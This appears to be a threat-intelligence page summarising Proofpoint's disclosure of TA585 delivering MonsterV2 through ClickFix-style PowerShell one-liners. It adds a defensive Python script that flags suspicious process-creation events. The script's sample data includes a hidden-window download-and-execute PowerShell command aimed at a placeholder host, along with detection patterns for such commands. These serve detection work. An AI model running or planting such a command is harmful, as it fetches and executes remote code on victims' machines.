MonsterV2 phishing delivery and payload capabilities
Malware Activity
Summary
TA585 is a newly identified cybercriminal group that delivers MonsterV2 through phishing and malware infrastructure it operates itself. According to Proofpoint, MonsterV2 was first advertised in February 2025, and TA585 uses compromised websites, fake CAPTCHA/ClickFix pages, and PowerShell one-liners to deliver the malware. The activity later expanded into a GitHub-themed campaign that abused repository notifications and fake security alerts, and some attacks also distributed Rhadamanthys.
Related Happenings
Mini Shai-Hulud npm supply-chain malware wave
Malware Activity
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
Vidar infostealer market rise and distribution expansion
Malware Activity
First: 28.04.2026 22:07
Last: 28.04.2026 22:07
Sources 1
About this happening:
**Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Mirax Android banking trojan with residential proxy nodes
Malware Activity
First: 13.04.2026 17:30
Last: 13.04.2026 17:30
Sources 1
About this happening:
Mirax is spreading across **Europe** with **remote access** and **residential proxy** features, increasing the risk of device compromise, data theft, and traffic abuse. The Androi...
OAuth device-code phishing campaign targeting SaaS accounts
Campaign
First: 04.04.2026 17:17
Last: 04.04.2026 17:17
Sources 1
About this happening:
A **device code phishing** campaign now includes **EvilTokens**, a **phishing-as-a-service** kit sold on **Telegram** that uses the **OAuth 2.0 device authorization flow** to hija...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Timeline
14.10.2025 08:28 3 articles · 7mo ago
TA585 and MonsterV2 disclosure
Initial Disclosure: Proofpoint researchers disclosed TA585 as a previously undocumented threat actor using phishing campaigns, web injections, IRS-themed lures, fake CAPTCHA/ClickFix pages, and malicious JavaScript injections to deliver MonsterV2, a malware family also tracked as Aurotun Stealer. The campaign history in the disclosure includes MonsterV2 first being observed advertised on criminal forums in February 2025, a switch by the actor from Lumma Stealer to MonsterV2 in early 2025, and later attack waves in April 2025 that placed fake CAPTCHA overlays on legitimate websites and relied on PowerShell-based delivery.
Show sources
- Researchers Expose TA585’s MonsterV2 Malware Capabilities and Attack Chain — thehackernews.com — 14.10.2025 08:28
- Hacker Group TA585 Emerges With Advanced Attack Infrastructure — www.infosecurity-magazine.com — 14.10.2025 18:00
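The fake CAPTCHA/ClickFix delivery described above ends with the victim pasting a PowerShell one-liner into the Win+R dialog or a console, so the detectable artifact on the endpoint is a script host spawned by a user-facing parent with a hidden-window, encoded or download-and-execute command line. The following triage script is an added example, not code from Proofpoint or from the page's sources: it scores constructed Sysmon Event ID 1-style JSON records against generic ClickFix-pattern heuristics. The event values, the `example.invalid` URL and the process paths are invented; nothing here is a MonsterV2-specific indicator.

```python
"""Heuristic triage of process-creation events for ClickFix-style PowerShell launches.

Added example, not Proofpoint's or the page's code. The event records in
SAMPLE_EVENTS are constructed Sysmon Event ID 1-style JSON lines: the field
names (Image, ParentImage, CommandLine) follow Sysmon's schema, the values
are invented for illustration.
"""
import json
import re

# Parents a user would paste a ClickFix command into: the Win+R dialog
# (explorer.exe) or a terminal/console the user opened themselves.
USER_PASTE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits typical of pasted one-liners: hidden window, base64
# encoded payload, in-memory execution of a download, or mshta fetching a URL.
SUSPICIOUS = [
    re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"(?:downloadstring|invoke-webrequest|iwr|curl)\b", re.I),
    re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event dict.

    Score is the number of independent indicators hit; non-script-host
    images score 0 regardless of parent or command line.
    """
    reasons = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image not in SCRIPT_HOSTS:
        return 0, reasons
    if parent in USER_PASTE_PARENTS:
        reasons.append(f"script host spawned by {parent}")
    for pat in SUSPICIOUS:
        if pat.search(cmd):
            reasons.append(f"cmdline matches {pat.pattern!r}")
    return len(reasons), reasons


def triage(lines, threshold=2):
    """Parse JSON lines; return [(index, score, reasons)] for events scoring
    at or above threshold. Malformed or blank lines are skipped, not fatal."""
    hits = []
    for i, line in enumerate(lines):
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


SAMPLE_EVENTS = [
    # constructed: user pasted a ClickFix one-liner into Win+R (explorer.exe parent)
    '{"EventID":1,"Image":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe",'
    '"ParentImage":"C:\\\\Windows\\\\explorer.exe",'
    '"CommandLine":"powershell -w hidden -c \\"iex (iwr http://example.invalid/stage1)\\""}',
    # constructed: benign admin script launched by a scheduled task (svchost.exe parent)
    '{"EventID":1,"Image":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe",'
    '"ParentImage":"C:\\\\Windows\\\\System32\\\\svchost.exe",'
    '"CommandLine":"powershell -File C:\\\\Scripts\\\\backup.ps1"}',
    # constructed: explorer.exe launching a non-script host, must not alert
    '{"EventID":1,"Image":"C:\\\\Windows\\\\notepad.exe",'
    '"ParentImage":"C:\\\\Windows\\\\explorer.exe","CommandLine":"notepad.exe"}',
]

if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}")
        for r in reasons:
            print("   ", r)
```

Only the first constructed event is flagged: it hits the explorer.exe parent, the hidden window switch, `iex` and `iwr`, while the scheduled-task script and the notepad launch score zero. The parent-process check is what separates a pasted command from routine automation; the command-line patterns alone would also fire on legitimate encoded or download-based admin tooling, which is why the default threshold requires two independent indicators.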